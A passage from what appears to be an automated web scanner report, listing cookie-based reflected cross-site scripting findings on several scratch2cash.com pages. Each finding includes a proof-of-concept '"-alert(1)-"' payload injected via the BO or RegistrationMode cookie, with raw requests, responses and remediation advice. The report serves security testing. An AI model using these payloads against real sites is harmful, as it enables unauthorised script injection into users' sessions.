Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53665


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMac554"-alert(1)-"99961b07b3d";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.380. http://www.scratch2cash.com/FairPlay.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /FairPlay.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e2ea"-alert(1)-"e01126ddd6b was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM3e2ea"-alert(1)-"e01126ddd6b; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: BO=FM3e2ea"-alert(1)-"e01126ddd6b; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47720


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM3e2ea"-alert(1)-"e01126ddd6b";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.381. http://www.scratch2cash.com/FairPlay.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /FairPlay.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 254b0"-alert(1)-"5fd0cfafeea was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FairPlay.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM254b0"-alert(1)-"5fd0cfafeea; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM254b0"-alert(1)-"5fd0cfafeea; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47720


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM254b0"-alert(1)-"5fd0cfafeea";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.382. http://www.scratch2cash.com/Help.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /Help.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6481"-alert(1)-"0e3b177a35b was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Help.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FMa6481"-alert(1)-"0e3b177a35b; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:34 GMT; path=/
Set-Cookie: BO=FMa6481"-alert(1)-"0e3b177a35b; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:34 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:34 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:34 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:34 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47212


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMa6481"-alert(1)-"0e3b177a35b";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.383. http://www.scratch2cash.com/Help.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /Help.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2050b"-alert(1)-"13c02710b6 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Help.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM2050b"-alert(1)-"13c02710b6; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM2050b"-alert(1)-"13c02710b6; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47211


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM2050b"-alert(1)-"13c02710b6";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.384. http://www.scratch2cash.com/Home.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /Home.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd6ac"-alert(1)-"44e94d65cc0 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Home.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FMfd6ac"-alert(1)-"44e94d65cc0; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: BO=FMfd6ac"-alert(1)-"44e94d65cc0; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:42 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44002


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMfd6ac"-alert(1)-"44e94d65cc0";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.385. http://www.scratch2cash.com/Home.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /Home.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11158"-alert(1)-"41dbe1ffb72 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Home.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM11158"-alert(1)-"41dbe1ffb72; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM11158"-alert(1)-"41dbe1ffb72; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:37 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44002


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM11158"-alert(1)-"41dbe1ffb72";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.386. http://www.scratch2cash.com/InviteFriend.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /InviteFriend.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 587a3"-alert(1)-"656db84de5e was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM587a3"-alert(1)-"656db84de5e; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: BO=FM587a3"-alert(1)-"656db84de5e; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 58504


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM587a3"-alert(1)-"656db84de5e";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.387. http://www.scratch2cash.com/InviteFriend.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /InviteFriend.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 207e8"-alert(1)-"c4e2a089614 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /InviteFriend.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM207e8"-alert(1)-"c4e2a089614; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM207e8"-alert(1)-"c4e2a089614; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:29 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 58504


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM207e8"-alert(1)-"c4e2a089614";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.388. http://www.scratch2cash.com/PlayersClub.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /PlayersClub.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 574ed"-alert(1)-"572521f5df4 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM574ed"-alert(1)-"572521f5df4; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: BO=FM574ed"-alert(1)-"572521f5df4; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:35 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54985


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM574ed"-alert(1)-"572521f5df4";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.389. http://www.scratch2cash.com/PlayersClub.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /PlayersClub.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7ad9"-alert(1)-"92dfafb48c7 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
